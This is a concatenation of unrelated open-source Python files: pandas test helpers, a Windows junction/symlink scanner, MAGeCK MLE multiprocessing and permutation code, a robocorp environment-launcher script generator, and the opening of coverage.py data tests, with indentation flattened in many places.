>>> from pandas.util.testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
Traceback
...
      URLError: <urlopen error unknown url type: rabbit>
You can specify alternative URLs::
>>> @network("http://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
SkipTest
Errors not related to networking will always be raised.
"""
from nose import SkipTest
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if check_before_test and not raise_on_error:
if not can_connect(url, error_classes):
raise SkipTest
try:
return t(*args, **kwargs)
except Exception as e:
errno = getattr(e, 'errno', None)
            if errno is None and hasattr(e, "reason"):
errno = getattr(e.reason, 'errno', None)
if errno in skip_errnos:
raise SkipTest("Skipping test due to known errno"
" and error %s" % e)
try:
e_str = traceback.format_exc(e)
except:
e_str = str(e)
if any([m.lower() in e_str.lower() for m in _skip_on_messages]):
raise SkipTest("Skipping test because exception message is known"
" and error %s" % e)
if not isinstance(e, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
raise SkipTest("Skipping test due to lack of connectivity"
" and error %s" % e)
return wrapper
with_connectivity_check = network
class SimpleMock(object):
"""
Poor man's mocking object
Note: only works for new-style classes, assumes __getattribute__ exists.
>>> a = type("Duck",(),{})
>>> a.attr1,a.attr2 ="fizz","buzz"
>>> b = SimpleMock(a,"attr1","bar")
>>> b.attr1 == "bar" and b.attr2 == "buzz"
True
>>> a.attr1 == "fizz" and a.attr2 == "buzz"
True
"""
def __init__(self, obj, *args, **kwds):
assert(len(args) % 2 == 0)
attrs = kwds.get("attrs", {})
for k, v in zip(args[::2], args[1::2]):
# dict comprehensions break 2.6
attrs[k] = v
self.attrs = attrs
self.obj = obj
def __getattribute__(self, name):
attrs = object.__getattribute__(self, "attrs")
obj = object.__getattribute__(self, "obj")
return attrs.get(name, type(obj).__getattribute__(obj, name))
@contextmanager
def stdin_encoding(encoding=None):
"""
Context manager for running bits of code while emulating an arbitrary
stdin encoding.
>>> import sys
>>> _encoding = sys.stdin.encoding
>>> with stdin_encoding('AES'): sys.stdin.encoding
'AES'
>>> sys.stdin.encoding==_encoding
True
"""
import sys
_stdin = sys.stdin
sys.stdin = SimpleMock(sys.stdin, "encoding", encoding)
yield
sys.stdin = _stdin
def assertRaises(_exception, _callable=None, *args, **kwargs):
"""assertRaises that is usable as context manager or in a with statement
Exceptions that don't match the given Exception type fall through::
>>> with assertRaises(ValueError):
... raise TypeError("banana")
...
Traceback (most recent call last):
...
TypeError: banana
If it raises the given Exception type, the test passes
>>> with assertRaises(KeyError):
... dct = dict()
... dct["apple"]
If the expected error doesn't occur, it raises an error.
>>> with assertRaises(KeyError):
... dct = {'apple':True}
... dct["apple"]
Traceback (most recent call last):
...
AssertionError: KeyError not raised.
In addition to using it as a contextmanager, you can also use it as a
function, just like the normal assertRaises
>>> assertRaises(TypeError, ",".join, [1, 3, 5]);
"""
manager = _AssertRaisesContextmanager(exception=_exception)
# don't return anything if used in function form
if _callable is not None:
with manager:
_callable(*args, **kwargs)
else:
return manager
def assertRaisesRegexp(_exception, _regexp, _callable=None, *args, **kwargs):
""" Port of assertRaisesRegexp from unittest in Python 2.7 - used in with statement.
Explanation from standard library:
Like assertRaises() but also tests that regexp matches on the string
representation of the raised exception. regexp may be a regular expression
object or a string containing a regular expression suitable for use by
re.search().
You can pass either a regular expression or a compiled regular expression object.
>>> assertRaisesRegexp(ValueError, 'invalid literal for.*XYZ',
... int, 'XYZ');
>>> import re
>>> assertRaisesRegexp(ValueError, re.compile('literal'), int, 'XYZ');
If an exception of a different type is raised, it bubbles up.
>>> assertRaisesRegexp(TypeError, 'literal', int, 'XYZ');
Traceback (most recent call last):
...
ValueError: invalid literal for int() with base 10: 'XYZ'
>>> dct = dict()
>>> assertRaisesRegexp(KeyError, 'pear', dct.__getitem__, 'apple');
Traceback (most recent call last):
...
AssertionError: "pear" does not match "'apple'"
You can also use this in a with statement.
>>> with assertRaisesRegexp(TypeError, 'unsupported operand type\(s\)'):
... 1 + {}
>>> with assertRaisesRegexp(TypeError, 'banana'):
... 'apple'[0] = 'b'
Traceback (most recent call last):
...
AssertionError: "banana" does not match "'str' object does not support \
item assignment"
"""
manager = _AssertRaisesContextmanager(exception=_exception, regexp=_regexp)
if _callable is not None:
with manager:
_callable(*args, **kwargs)
else:
return manager
class _AssertRaisesContextmanager(object):
"""handles the behind the scenes work for assertRaises and assertRaisesRegexp"""
def __init__(self, exception, regexp=None, *args, **kwargs):
self.exception = exception
if regexp is not None and not hasattr(regexp, "search"):
regexp = re.compile(regexp, re.DOTALL)
self.regexp = regexp
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
expected = self.exception
if not exc_type:
name = getattr(expected, "__name__", str(expected))
raise AssertionError("{0} not raised.".format(name))
if issubclass(exc_type, expected):
return self.handle_success(exc_type, exc_value, traceback)
return self.handle_failure(exc_type, exc_value, traceback)
def handle_failure(*args, **kwargs):
# Failed, so allow Exception to bubble up
return False
def handle_success(self, exc_type, exc_value, traceback):
if self.regexp is not None:
val = str(exc_value)
if not self.regexp.search(val):
e = AssertionError('"%s" does not match "%s"' %
(self.regexp.pattern, str(val)))
raise_with_traceback(e, traceback)
return True
@contextmanager
def assert_produces_warning(expected_warning=Warning, filter_level="always", clear=None):
"""
Context manager for running code that expects to raise (or not raise)
warnings. Checks that code raises the expected warning and only the
expected warning. Pass ``False`` or ``None`` to check that it does *not*
raise a warning. Defaults to ``exception.Warning``, baseclass of all
Warnings. (basically a wrapper around ``warnings.catch_warnings``).
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
..warn:: This is *not* thread-safe.
"""
with warnings.catch_warnings(record=True) as w:
if clear is not None:
            # make sure that we are clearing these warnings
# if they have happened before
# to guarantee that we will catch them
if not is_list_like(clear):
clear = [ clear ]
for m in clear:
try:
m.__warningregistry__.clear()
except:
pass
saw_warning = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if (expected_warning and issubclass(actual_warning.category,
expected_warning)):
saw_warning = True
else:
extra_warnings.append(actual_warning.category.__name__)
if expected_warning:
assert saw_warning, ("Did not see expected warning of class %r."
% expected_warning.__name__)
assert not extra_warnings, ("Caused unexpected warning(s): %r."
% extra_warnings)
def skip_if_no_ne(engine='numexpr'):
import nose
_USE_NUMEXPR = pd.computation.expressions._USE_NUMEXPR
if engine == 'numexpr':
try:
import numexpr as ne
except ImportError:
raise nose.SkipTest("numexpr not installed")
if not _USE_NUMEXPR:
raise nose.SkipTest("numexpr disabled")
if ne.__version__ < LooseVersion('2.0'):
raise nose.SkipTest("numexpr version too low: "
"%s" % ne.__version__)
def disabled(t):
t.disabled = True
return t
class RNGContext(object):
"""
    Context manager to set the numpy random number generator seed. Returns
to the original value upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
@contextmanager
def use_numexpr(use, min_elements=expr._MIN_ELEMENTS):
olduse = expr._USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
# Also provide all assert_* functions in the TestCase class
for name, obj in inspect.getmembers(sys.modules[__name__]):
if inspect.isfunction(obj) and name.startswith('assert'):
setattr(TestCase, name, staticmethod(obj))
def test_parallel(num_threads=2):
"""Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image: https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
threads = []
for i in range(num_threads):
thread = threading.Thread(target=func, args=args, kwargs=kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
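
# Illustrative sketch (not part of the original module): the decorated call below
# runs the body from four threads and only returns after all of them have joined.
def _example_test_parallel_usage():
    hits = []

    @test_parallel(num_threads=4)
    def _record():
        hits.append(1)

    _record()
    assert len(hits) == 4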
|
main.py
|
import multiprocessing
import os
import pickle
import sys
import win32api
storefile = '.\\store.bin'
class junction:
    def __init__(self, link=""):
        # one record for a junction/symlink: the link path and the targets found for it
        self.link = link
        self.links = []
        self.dict = {}
        self.key = self.link
        self.val = self.links
        self.tabs = 20

    def src(self, pth):
        # resolved (real) target of the link
        return os.path.realpath(pth)

    def path(self, pth):
        # absolute path of the link itself
        return os.path.abspath(pth)

    def lnsrc(self, pth):
        # number of 4-character tab blocks the path occupies, used for column alignment
        charsin = len(pth)
        lnblk = int((charsin + (4 - (charsin % 4))) / 4)
        return lnblk

    def make(self, link):
        # merge this link into the pickled store and return the updated dictionary
        new = [self.src(link), self.path(link)]
        store_dict = get_store(storefile)
        entry = make_entry(store_dict, new)
        store_dict[list(entry.keys())[0]] = entry[list(entry.keys())[0]]
        return store_dict

    def prtline(self, junktion, tabs):
        sp1 = '\t' * (tabs - self.lnsrc(junktion[0]))
        sp2 = '\t' * 5
        line = f'{junktion[0]}{sp1}{make_prtsign(junktion[0])}{sp2}{junktion[1]}'
        return line
def make_prtsign(path):
if os.path.exists(path):
symbol = "<-"
else:
symbol = "(dead link)"
return symbol
def get_drives():
drives = win32api.GetLogicalDriveStrings()
drives = drives.split('\000')[: -1]
return drives
def get_store(path):
with open(path, 'rb') as storage:
data = storage.read()
store = pickle.loads(data)
return store
def printout(tmp):
    # overwrite the current console line with the given text
    do_writeout(tmp, "over")
def make_entry(storedct, lst):
    key = lst[0]
    value = []
    # if key in storedct:
    #     value = storedct[key]
    value.append(lst[1])
    entry = {key: value}
    return entry
def is_jlnk(path: str) -> bool:
try:
return bool(os.readlink(path))
except OSError:
return False
def make_prtline(junktion, tabs=20):
    # junktion is a [src, path] pair; pad with tabs so the columns line up
    charsin = len(junktion[0])
    lnblk = int((charsin + (4 - (charsin % 4))) / 4)
    sp1 = '\t' * (tabs - lnblk)
    sp2 = '\t' * 5
    line = f'{junktion[0]}{sp1}{make_prtsign(junktion[0])}{sp2}{junktion[1]}'
    return line
def do_writeout(line, action):
switch = {
"over": f'\r\r\r{line}\n',
"new" : f'\r\r{line}'
}
sys.stdout.write(switch.get(action))
def do_save(storage, store):
with open(storage, "wb") as binstore:
pickle.dump(store, binstore)
def walk(drives, callback):
for drive in drives:
for current, folder, file in os.walk(drive, topdown=True):
callback(current)
def hit(link):
item = junction(link)
do_save(storefile, item.make(link))
do_writeout(make_prtline([item.src(link), item.path(link)]), "new")
def test(path):
if is_jlnk(path):
hit(path)
return
def main():
all_drives = get_drives()
do_writeout(all_drives, "new")
proc = multiprocessing.Process(target=walk, args=(all_drives, test))
    proc.start()
    proc.join()
# with concurrent.futures.ProcessPoolExecutor() as proc:
# walk = proc.submit(do_walk, all_drives, callback)
#
# if walk.done():
# do_writenew("finished scanning drives.")
userinput = input("\n\n\nenter Q to quit:")
if ("q" in userinput) | (proc.exitcode == 0):
do_writeout("Quitting ...", "new")
if __name__ == '__main__':
main()
|
mlemultiprocessing.py
|
'''
MAGeCK MLE multiprocessing
'''
import re
import sys
import logging
import multiprocessing
import copy
import numpy as np
import signal
from mageck.mleem import iteratenbem
# debug
try:
from IPython.core.debugger import Tracer
except:
pass
def thread_p_func(dinst,args,iteratenbemargs,returndict):
    '''
    Worker function for multiprocessing
    Parameters:
        dinst
            A dictionary of gene instances to be processed by this worker
        args
            Command-line arguments
        iteratenbemargs
            A dictionary of keyword arguments passed to the iteratenbem() function
        returndict
            A shared (multiprocessing.Manager) dictionary collecting the processed instances
    '''
name = multiprocessing.current_process().name
ngene=0
logging.info(name+': total '+str(len(dinst))+ ' instances.')
for (tgid,tginst) in list(dinst.items()):
if ngene % 1000 ==1 or args.debug:
logging.info(name+': Calculating '+tgid+' ('+str(ngene)+') ... ')
iteratenbem(tginst,**iteratenbemargs)
returndict[tgid]=tginst
ngene+=1
def runem_multiproc(allgenedict,args,nproc=1, argsdict={}):
    '''
    Calling iteratenbem using a given number of worker processes
    Arguments:
        allgenedict:
            a dictionary of all gene instances
        args:
            command-line arguments
        nproc
            The number of parallel worker processes
        argsdict
            Keyword arguments passed to iteratenbem
    '''
# separate dicts
instdictlist=[]
mnger=multiprocessing.Manager()
retdict=mnger.dict()
if nproc<=0:
logging.error('Error: incorrect number of threads.')
sys.exit(-1)
else:
ngene=0
instdictlist=[]
for i in range(nproc):
instdictlist.append({})
for (tgid,tginst) in list(allgenedict.items()):
nsg=tginst.nb_count.shape[1]
nbeta1=tginst.design_mat.shape[1]-1 # the number of betas excluding the 1st beta (baseline beta)
if nsg>=args.max_sgrnapergene_permutation:
logging.info('Skipping gene '+tgid+' from MLE calculation since there are too many sgRNAs. To change, revise the --max-sgrnapergene-permutation option.')
tginst.beta_estimate=np.array([0.0]*(nsg+nbeta1))
tginst.beta_pval=np.array([1.0]*(nbeta1))
tginst.beta_zscore=np.array([0.0]*(nbeta1))
tginst.beta_pval_pos=np.array([1.0]*(nbeta1))
tginst.beta_pval_neg=np.array([1.0]*(nbeta1))
continue
targetlistid=ngene %nproc
instdictlist[targetlistid][tgid]=tginst
ngene+=1
# start jobs
jobs=[]
if True:
for i in range(nproc):
j=multiprocessing.Process(target=thread_p_func, name='Thread '+str(i),args=(instdictlist[i],args,argsdict,retdict))
jobs.append(j)
j.start()
logging.info(j.name+' started.')
for jj in jobs:
jj.join()
logging.info(jj.name+' completed.')
else:
# solve ctrl+c issue in https://stackoverflow.com/questions/11312525/catch-ctrlc-sigint-and-exit-multiprocesses-gracefully-in-python
original_sigint_handler = signal.signal(signal.SIGINT, signal.SIG_IGN)
mp_pool=multiprocessing.Pool(nproc)
signal.signal(signal.SIGINT, original_sigint_handler)
try:
for i in range(nproc):
j=mp_pool.apply_async(func=thread_p_func, args=(instdictlist[i],args,argsdict,retdict))
logging.info('Thread '+str(i)+' started.')
except KeyboardInterrupt:
mp_pool.terminate()
else:
mp_pool.close()
mp_pool.join()
# post processing
logging.info('All threads completed.')
# save the instance
# Tracer()()
for tgid in list(retdict.keys()):
tginst=retdict[tgid]
allgenedict[tgid]=tginst
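
# Illustrative sketch (not part of MAGeCK): the round-robin partitioning used by
# runem_multiproc above, shown in isolation.  Items are dealt out to nproc buckets
# so that each worker process receives a roughly equal share of the genes.
def _example_round_robin_partition(items, nproc=2):
    buckets = [{} for _ in range(nproc)]
    for i, (key, value) in enumerate(items.items()):
        buckets[i % nproc][key] = value
    return buckets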
def iteratenbem_permutation(genedict,args,sg_per_gene=-1,background_genedict=None,debug=True,nround=100,allgenedict=None,removeoutliers=False,size_factor=None):
'''
Perform permutation test
Parameters:
genedict
A dictionary of gene structures
args
Parameters
sg_per_gene
Specify the number of sgRNAs per gene during permutation. Set this number when permuting per gene group. Default is -1 (use the same as the target gene).
background_genedict
A background dictionary of gene structures. If none, set it the same as genedict
debug
Whether to print debug information
nround
Number of rounds for permutation
allgenedict
The original dict of genes (only used for permutation)
removeoutliers
parameters to pass to iteratenbem
size_factor
size factor
'''
if background_genedict is None:
background_genedict=genedict
logging.info('Start permuting '+str(nround)+' rounds ...')
allsg=[]
#desmat=genedict[genedict.keys()[0]].design_mat
desmat=list(genedict.values())[0].design_mat
nbeta1=desmat.shape[1]-1
for (geneid, geneinst) in list(background_genedict.items()):
nsg=geneinst.nb_count.shape[1]
nsample=geneinst.nb_count.shape[0]
countmat=geneinst.nb_count.getT()
sgitem=[(geneinst.w_estimate[i],countmat[i]) for i in range(nsg)]
allsg+=sgitem
logging.info('Collecting '+str(len(allsg))+' sgRNAs from '+str(len(background_genedict))+' genes.')
#
if allgenedict is None:
genedictcopy=copy.deepcopy(background_genedict)
else:
genedictcopy=copy.deepcopy(allgenedict)
ngene=len(genedictcopy)
betazeros=np.zeros((nround*ngene,nbeta1))
#
betaz_id=0
for nrd in range(nround):
np.random.shuffle(allsg)
#
logging.info('Permuting round '+str(nrd)+' ...')
nid=0
# randomly assigning sgRNAs to genes
for (geneid, geneinst) in list(genedictcopy.items()):
# specify the number of sgs for this gene structure
if sg_per_gene == -1:
nsg=geneinst.nb_count.shape[1]
else:
nsg=sg_per_gene
nsample=geneinst.nb_count.shape[0]
selitem=allsg[nid:nid+nsg]
countmat=np.vstack([x[1] for x in selitem])
w_es=np.array([x[0] for x in selitem])
geneinst.nb_count=countmat.getT()
geneinst.w_estimate=w_es
nid+=nsg
if nid>= len(allsg):
nid=0
np.random.shuffle(allsg)
# end gene loop
#iteratenbem(geneinst,debug=False,estimateeff=True,updateeff=False,removeoutliers=removeoutliers,size_factor=size_factor,logem=False)
argsdict={'debug':False,'estimateeff':True,'updateeff':False,'removeoutliers':removeoutliers,'size_factor':size_factor,'logem':False}
runem_multiproc(genedictcopy,args,nproc=args.threads,argsdict=argsdict)
for (geneid, geneinst) in list(genedictcopy.items()):
nsg=geneinst.nb_count.shape[1]
beta_es=geneinst.beta_estimate[nsg:]
# Tracer()()
betazeros[betaz_id,:]=beta_es
betaz_id+=1
# end gene loop
# end permutation
logging.info('Assigning p values...')
assign_p_value_from_permuted_beta(betazeros,genedict)
return betazeros
def assign_p_value_from_permuted_beta(betazeros,genedict):
'''
Assigning p values to each gene based on the permutated beta scores
'''
ncompare=betazeros.shape[0]*1.0
for (geneid, geneinst) in list(genedict.items()):
nsg=geneinst.nb_count.shape[1]
beta_es=geneinst.beta_estimate[nsg:]
cp_u0=np.sum(betazeros>beta_es,axis=0)
cp_u1=np.sum(betazeros<beta_es,axis=0)
cp_ustack=np.vstack((cp_u0/ncompare,cp_u1/ncompare))
cp_minval=np.min(cp_ustack,axis=0)
#cp_minvec=np.array(cp_minval)[0]
cp_minvec=cp_minval*2
geneinst.beta_permute_pval=cp_minvec
geneinst.beta_permute_pval_neg=cp_ustack[1]
geneinst.beta_permute_pval_pos=cp_ustack[0]
# Tracer()()
def iteratenbem_permutation_by_nsg(genedict,args,debug=True,size_f=None):
'''
Perform permutation test, grouped by the number of sgrnas per gene
Parameters:
genedict
A dictionary of gene structures
args
Parameters
debug
Whether to print debug information
size_f
size factor
'''
genedict_group={}
# set up background gene group
bg_genedict={}
if args.control_sgrna is not None:
controlsglist=[line.strip() for line in open(args.control_sgrna)]
ncontrolsg=0
for (geneid, geneinst) in list(genedict.items()):
sgid=geneinst.sgrnaid
nsginctrl=sum([1 for x in sgid if x in controlsglist])
if nsginctrl>0:
bg_genedict[geneid]=geneinst
ncontrolsg+=len(sgid)
if nsginctrl <len(sgid):
logging.error('Gene '+geneid+' consists of both negative controls and non-negative controls. This is not allowed -- please check your negative control sgRNA list.')
sys.exit(-1)
if len(bg_genedict)==0:
logging.error('Cannot find genes containing negative control sgRNA IDs.')
sys.exit(-1)
logging.info('Using '+str(len(bg_genedict))+' genes and '+str(ncontrolsg)+' sgRNAs as negative controls for permutation...')
else:
bg_genedict=genedict
# assign genes to groups according to the number of sgRNAs per gene
for (geneid, geneinst) in list(genedict.items()):
nsg=geneinst.nb_count.shape[1]
if nsg not in genedict_group:
genedict_group[nsg]={}
genedict_group[nsg][geneid]=geneinst
# perform permutation based on gene groups
ngene_keys=sorted(genedict_group.keys())
last_permuted_beta=None
for ngene_i in range(len(ngene_keys)):
ngene=ngene_keys[ngene_i]
this_genedict=genedict_group[ngene]
if args.max_sgrnapergene_permutation>=ngene:
logging.info('Permuting groups of gene with '+str(ngene)+' sgRNAs per gene. Group progress: '+str(ngene_i+1)+'/'+str(len(genedict_group)))
last_permuted_beta=iteratenbem_permutation(this_genedict,args,sg_per_gene=ngene,background_genedict=bg_genedict,nround=args.permutation_round,allgenedict=genedict,removeoutliers=args.remove_outliers,size_factor=size_f)
else:
logging.info('Groups of gene with '+str(ngene)+' sgRNAs per gene: assigning p values based on previous group results. Group progress: '+str(ngene_i+1)+'/'+str(len(genedict_group)))
if last_permuted_beta is None:
logging.error('No permutation data found. Please increase the value of --max-sgrnapergene-permutation.')
sys.exit(-1)
assign_p_value_from_permuted_beta(last_permuted_beta,this_genedict)
|
run_with_env.py
|
import pathlib
from typing import Dict, List, Optional, Tuple
import sys
import os
import itertools
from functools import partial
import threading
import time
from robocorp_ls_core.robotframework_log import get_logger
log = get_logger(__name__)
def create_run_with_env_code(
robo_env: Dict[str, str], base_executable_and_args: List[str]
) -> str:
"""
:param robo_env:
This is the environment
-- if using RCC it's collected through something as:
rcc holotree variables --space <space_name> -r <robot_path> -e <env_json_path> --json
    :param base_executable_and_args:
        The executable which should be called (usually the path to python.exe),
        together with any fixed arguments that should precede the caller's arguments.
"""
set_vars = []
as_dict: Dict[str, str] = {}
found_new_line = False
for key, value in robo_env.items():
if sys.platform == "win32":
# Reference (just text, not code): https://stackoverflow.com/a/16018942/110451
value = value.replace("^", "^^")
value = value.replace("%", "%%")
value = value.replace("!", "^!")
value = value.replace("|", "^|")
value = value.replace("&", "^&")
value = value.replace(">", "^>")
value = value.replace("<", "^<")
value = value.replace("'", "^'")
if "\n" in value or "\r" in value:
found_new_line = True
value = value.replace("\r\n", "\n").replace("\r", "\n")
value = value.replace("\n", "!__NEW_LINE_IN_ENV__!")
set_vars.append(f'SET "{key}={value}"')
else:
# Reference (just text, not code): https://stackoverflow.com/a/20053121/110451
value = value.replace("'", "'\\''")
value = f"'{value}'"
set_vars.append(f"export {key}={value}")
as_dict[key] = value
set_vars_as_str = "\n".join(set_vars)
if found_new_line:
if sys.platform == "win32":
new_line_preamble = """
setlocal EnableDelayedExpansion
(set __NEW_LINE_IN_ENV__=^
%=Do not remove this line=%
)
"""
set_vars_as_str = new_line_preamble + set_vars_as_str
import subprocess
if sys.platform == "win32":
shebang = "@echo off"
executable_with_args = f"{subprocess.list2cmdline(base_executable_and_args)} %*"
else:
shebang = "#!/usr/bin/env bash"
executable_with_args = (
f'{subprocess.list2cmdline(base_executable_and_args)} "$@"'
)
code = f"""{shebang}
{set_vars_as_str}
{executable_with_args}
"""
return code
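
# Illustrative sketch (not part of the original module): generating the launcher
# script body for a small environment.  The variable names and command line below
# are made up for the example.
def _example_create_run_with_env_code():
    code = create_run_with_env_code(
        {"MY_VAR": "some value", "OTHER": "1"},
        [sys.executable, "-m", "robot"],
    )
    return code   # a .bat body on Windows, a bash script body elsewhere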
_next_number: "partial[int]" = partial(next, itertools.count())
def _compute_path_for_env(temp_dir: Optional[str] = None) -> pathlib.Path:
import tempfile
if not temp_dir:
temp_dir = os.path.join(tempfile.gettempdir(), "rf-ls-run")
os.makedirs(temp_dir, exist_ok=True)
f = tempfile.mktemp(
suffix=(".bat" if sys.platform == "win32" else ".sh"),
prefix="run_env_%02d_" % _next_number(),
dir=temp_dir,
)
_delete_in_thread(temp_dir)
return pathlib.Path(f)
def _delete_in_thread(temp_dir) -> threading.Thread:
t = threading.Thread(target=_delete_old, args=(temp_dir,))
t.daemon = True
t.start()
return t
def _delete_old(temp_dir: str):
try:
# Remove files only after 2 days.
one_day_in_seconds = 86400
delete_older_than = time.time() - (one_day_in_seconds * 2)
f = pathlib.Path(temp_dir)
for entry in os.scandir(f):
if entry.name.startswith("run_env_"):
if entry.stat().st_mtime < delete_older_than:
remove = f / entry.name
try:
remove.unlink()
except:
log.debug("Unable to remove: %s", remove)
except:
log.exception("Error removing old launch files.")
def write_as_script(code: str, script_path: pathlib.Path):
script_path.write_text(code, "utf-8", "replace")
if sys.platform != "win32":
# We need to make it executable...
import stat
st = os.stat(str(script_path))
os.chmod(str(script_path), st.st_mode | stat.S_IEXEC)
def disable_launch_env_script():
return os.environ.get("ROBOTFRAMEWORK_LS_LAUNCH_ENV_SCRIPT", "1").lower() in (
"0",
"false",
)
def _update_command_line_to_write_pid(cmdline: List[str], env: dict, write_pid_to: str):
from robocorp_ls_core import run_and_save_pid
new_cmdline = [sys.executable, run_and_save_pid.__file__, write_pid_to] + cmdline
return new_cmdline, env
def update_cmdline_and_env(
cmdline: List[str], env: Dict[str, str], write_pid_to: Optional[str] = None
) -> Tuple[List[str], Dict[str, str]]:
"""
Ideally only this function is actually used from this module.
It receives an existing command line and environment and provides a new
command line and environment to be used depending which should have the
same effect when running.
:param write_pid_to: if passed, the launch will be made in a way that
a wrapper script is used to launch the script and then write the
pid of the launched executable to the passed file.
"""
if write_pid_to:
cmdline, env = _update_command_line_to_write_pid(cmdline, env, write_pid_to)
embed_args = 3
else:
embed_args = 1
if disable_launch_env_script():
return cmdline, env
set_env_and_run_code = create_run_with_env_code(env, cmdline[:embed_args])
if len(set_env_and_run_code) > 240:
script_path = _compute_path_for_env()
write_as_script(set_env_and_run_code, script_path)
new_cmdline = [str(script_path)] + cmdline[embed_args:]
return new_cmdline, {}
return cmdline, env
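
# Illustrative sketch (not part of the original module): a typical call site.
# "my_task.py" is a hypothetical script; when the generated environment code is
# long enough, the returned command line points at a temporary launcher script
# and the returned environment is empty.
def _example_update_cmdline_and_env():
    cmdline = [sys.executable, "-u", "my_task.py"]
    env = dict(os.environ)
    new_cmdline, new_env = update_cmdline_and_env(cmdline, env)
    return new_cmdline, new_env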
|
test_data.py
|
# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://github.com/nedbat/coveragepy/blob/master/NOTICE.txt
"""Tests for coverage.data"""
import glob
import os
import os.path
import re
import sqlite3
import threading
import mock
from coverage.data import CoverageData, combine_parallel_data
from coverage.data import add_data_to_hash, line_counts
from coverage.debug import DebugControlString
from coverage.files import PathAliases, canonical_filename
from coverage.misc import CoverageException
from tests.coveragetest import CoverageTest
LINES_1 = {
'a.py': {1: None, 2: None},
'b.py': {3: None},
}
SUMMARY_1 = {'a.py': 2, 'b.py': 1}
MEASURED_FILES_1 = ['a.py', 'b.py']
A_PY_LINES_1 = [1, 2]
B_PY_LINES_1 = [3]
LINES_2 = {
'a.py': {1: None, 5: None},
'c.py': {17: None},
}
SUMMARY_1_2 = {'a.py': 3, 'b.py': 1, 'c.py': 1}
MEASURED_FILES_1_2 = ['a.py', 'b.py', 'c.py']
ARCS_3 = {
'x.py': {
(-1, 1): None,
(1, 2): None,
(2, 3): None,
(3, -1): None,
},
'y.py': {
(-1, 17): None,
(17, 23): None,
(23, -1): None,
},
}
X_PY_ARCS_3 = [(-1, 1), (1, 2), (2, 3), (3, -1)]
Y_PY_ARCS_3 = [(-1, 17), (17, 23), (23, -1)]
SUMMARY_3 = {'x.py': 3, 'y.py': 2}
MEASURED_FILES_3 = ['x.py', 'y.py']
X_PY_LINES_3 = [1, 2, 3]
Y_PY_LINES_3 = [17, 23]
ARCS_4 = {
'x.py': {
(-1, 2): None,
(2, 5): None,
(5, -1): None,
},
'z.py': {
(-1, 1000): None,
(1000, -1): None,
},
}
SUMMARY_3_4 = {'x.py': 4, 'y.py': 2, 'z.py': 1}
MEASURED_FILES_3_4 = ['x.py', 'y.py', 'z.py']
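
# Illustrative sketch (not part of the original test module): how the SUMMARY_*
# line counts above relate to the arc data -- a file's count is the number of
# distinct real (positive) line numbers mentioned in its arcs, e.g.
# _line_counts_from_arcs(ARCS_3) == SUMMARY_3.
def _line_counts_from_arcs(arcs):
    return {fname: len({lineno for pair in pairs for lineno in pair if lineno > 0})
            for fname, pairs in arcs.items()}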
class DataTestHelpers(CoverageTest):
"""Test helpers for data tests."""
def assert_line_counts(self, covdata, counts, fullpath=False):
"""Check that the line_counts of `covdata` is `counts`."""
self.assertEqual(line_counts(covdata, fullpath), counts)
def assert_measured_files(self, covdata, measured):
"""Check that `covdata`'s measured files are `measured`."""
self.assertCountEqual(covdata.measured_files(), measured)
def assert_lines1_data(self, covdata):
"""Check that `covdata` has the data from LINES1."""
self.assert_line_counts(covdata, SUMMARY_1)
self.assert_measured_files(covdata, MEASURED_FILES_1)
self.assertCountEqual(covdata.lines("a.py"), A_PY_LINES_1)
self.assertEqual(covdata.run_infos(), [])
self.assertFalse(covdata.has_arcs())
def assert_arcs3_data(self, covdata):
"""Check that `covdata` has the data from ARCS3."""
self.assert_line_counts(covdata, SUMMARY_3)
self.assert_measured_files(covdata, MEASURED_FILES_3)
self.assertCountEqual(covdata.lines("x.py"), X_PY_LINES_3)
self.assertCountEqual(covdata.arcs("x.py"), X_PY_ARCS_3)
self.assertCountEqual(covdata.lines("y.py"), Y_PY_LINES_3)
self.assertCountEqual(covdata.arcs("y.py"), Y_PY_ARCS_3)
self.assertTrue(covdata.has_arcs())
self.assertEqual(covdata.run_infos(), [])
class CoverageDataTest(DataTestHelpers, CoverageTest):
"""Test cases for CoverageData."""
no_files_in_temp_dir = True
def test_empty_data_is_false(self):
covdata = CoverageData()
self.assertFalse(covdata)
def test_line_data_is_true(self):
covdata = CoverageData()
covdata.add_lines(LINES_1)
self.assertTrue(covdata)
def test_arc_data_is_true(self):
covdata = CoverageData()
covdata.add_arcs(ARCS_3)
self.assertTrue(covdata)
def test_empty_line_data_is_false(self):
covdata = CoverageData()
covdata.add_lines({})
self.assertFalse(covdata)
def test_empty_arc_data_is_false(self):
covdata = CoverageData()
